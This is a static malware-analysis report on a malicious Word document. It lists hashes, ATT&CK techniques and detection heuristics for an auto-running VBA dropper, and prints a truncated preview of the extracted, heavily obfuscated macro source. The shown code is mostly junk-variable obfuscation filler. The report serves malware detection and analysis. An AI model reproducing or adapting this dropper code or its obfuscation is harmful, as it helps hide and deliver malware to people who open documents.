Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6071f9205ed8540…

MALICIOUS

Office (OLE)

Size: 153.5 KB
Created: 2016-11-01 17:14:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 111945a5ce35ee497c77e89a0dec1574
SHA-1: ee77a01540d931a9d1d920be0ce723b6fbec04b8
SHA-256: e6071f9205ed8540df9612d3f1a001f497931fc76dee43fee1e77750d00df256
Risk Score: 260

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is further supported by the 'CreateObject' call and the detection of VBA p-code auto-execution. The primary function of the macros appears to be downloading and executing a second-stage payload, as suggested by the 'Doc.Dropper.Agent' ClamAV detection.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-1817555 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-1817555
  • VBA macros detected [medium] (OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    The VBA code calls Shell(), which executes an external command
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    A Document_Open macro is present; it runs automatically when the document is opened
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    The VBA code calls CreateObject(), which instantiates COM objects at runtime
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only macros and documents whose source extraction failed, where no visible VBA source is available.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35967 bytes
SHA-256: 2f6e6b9bb9a8f630974636b83dc84d4c4b064fe315c1ece2868b704bf71f100a
Preview script (first 1,000 lines of the extracted script; the listing below is truncated)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function qJPkN()

Dim EOQllf As Byte
EOQllf = 220
Dim UIGon As Single
UIGon = Sgn(45966.318971064)
' Served
Dim xfAFWt5 As Integer
xfAFWt5 = -24556
Const dCrjEJJ = False
' Interpose brian landward wild
Dim MKfiI As Long
MKfiI = 0
Dim ZyQpC As Single
ZyQpC = Sgn(39594.01857151)
' Accent republicans wild
For DyyCIFX = 0 To -3823
Dim OwBpo As Double
OwBpo = Sgn(7910.0850055289)
' Differential
Dim Hf9Lu As Byte
Hf9Lu = 206
Dim TsQp5is As Double
TsQp5is = 44384.90769498
Next
Dim yFhoTf As Double
yFhoTf = 1154.2641720323
Dim ACkDN As Long
ACkDN = Sgn(0)
Dim vGyzoyE As Long
vGyzoyE = Year(Date)
End Function
Function Tkwss7y(FcBf1) As String
Dim O3gd3ygYB As Integer
O3gd3ygYB = Sgn(-20091)
' Damnation eradicate swimmer
Dim DWRfyhV As Single
DWRfyhV = Round(504.455130562)
' Primer palate tcp hustle distillation flaccid amass
Const mdY9TUE As Byte = 173
Dim xrWONVzBN As Integer
xrWONVzBN = Month(Date)
' Prerogative stumped mortgages
Dim YNMiMZKt As Integer
Dim llGxoa As Integer
llGxoa = Sgn(29636)
Dim tI3vflY As Boolean
tI3vflY = True
' Caption herbage mother
Dim FYonPFWT As Boolean
FYonPFWT = True
' Affects adorable tgp downtown cds
Dim Tpijl As Boolean
Tpijl = True
' Stream ilk
Dim LmDYG As Long
LmDYG = vbFriday

Dim UHEDKm As Single
UHEDKm = 9837.1638680484
Const eeuXmY As Boolean = True
Dim GIlVIeu0 As Boolean
GIlVIeu0 = True
' Wiring cascade deduct casey
Const fcUiw As Single = 46399.057405329
' Grenadier preoccupation shorter drip onslaught
For syld1 = 0 To -14596
Dim guySCl
guySCl = UCase("Nb")
Dim dIzAv As Byte
dIzAv = 22
Dim vlfzyy As Integer
vlfzyy = Sgn(-17194)
' Intolerance miss jowl intimidate college
Dim brjCcO As Long
brjCcO = Sgn(-882246386)
' Hw birds his
Next syld1
' Disturbed deeply
Dim VR2FdxW As Double
VR2FdxW = Fix(26176.72309319)
Dim RalhrU As String
RalhrU = StrConv("QXWSge6", vbLowerCase)
' Lavishly
Const dVxCoflC As Boolean = True
Dim ITAjlw9 As String
ITAjlw9 = StrConv("q", vbLowerCase)
' Tripe girls
For sfoRv = 0 To 27866
Dim ZRtDcJ As Single
ZRtDcJ = Round(44411.992182338)
' Checklist powerpoint application
Dim eHhjNubKu As Double
eHhjNubKu = 64276.257729746
Dim jfZPKz As Integer
jfZPKz = Sgn(16067)
Dim PmwWnh As Single
PmwWnh = Val(2790.713519702)
Dim yOEx9LF As Byte
yOEx9LF = 33
' Leopard oasis tokyo albion junction tag
Next sfoRv
Dim wTuoAL As String
Const rWhPwd As Integer = -30269
Dim UMxdRP As Integer
UMxdRP = 29834
' Desultory callous
Dim KthZH As Single
KthZH = 3096.1054134546
Dim Znrsb As Integer
Znrsb = -273
' Darkness ai
Dim n8DFf
n8DFf = Year(Date)
Dim mZ9pz As Double
mZ9pz = Val(33456.438687323)
Dim XPRR7 As Boolean
XPRR7 = True
' Scenes twelve direction switch variables channel
Dim nsGZmMAQ As Integer
nsGZmMAQ = Sgn(9358)
' Eerie yeast compendium seats mutter
Dim A8E9Q9U As Long
A8E9Q9U = Sgn(-2015413552)
' Trends bloggers
Dim V3FMmk7
V3FMmk7 = Year(Date)
Dim a7fgY As Long

Dim VQstT As Boolean
VQstT = True
' Considers estate somali
Dim kUqTpWqn As Single
kUqTpWqn = Sgn(58756.167860263)
Const HtGZK As Boolean = True
For DgwCOR = 0 To 9749

Dim bQcBzz5wF As Byte
bQcBzz5wF = 184
' Poll vancouver avenger stephanie
Dim NYSnFL As Byte
NYSnFL = 52
Const XSMJgCm = -1765209700
' Clammy started assigned mu charger
Dim LesIT6 As Byte
LesIT6 = 21
Next
a7fgY = UBound(FcBf1)
Dim TnZiN2 As Single
TnZiN2 = Int(62330.478346405)
' Abridged pride
Dim ApzSSF As Double
ApzSSF = Round(7167.1586690204)
' Booking queenly radically
Dim BhBGJ As Single
BhBGJ = Sgn(61536.060911872)
' Power armor
Dim DAB8xvk As Boolean
DAB8xvk = False
' Emotions concord vista
Dim Yff0uZ As Single
Yff0uZ = Int(3177.3373609631)
Dim FA3XrWG
FA3XrWG = "QDVvi6O"
If Len(FA3XrWG) > 24239 Th
... (truncated)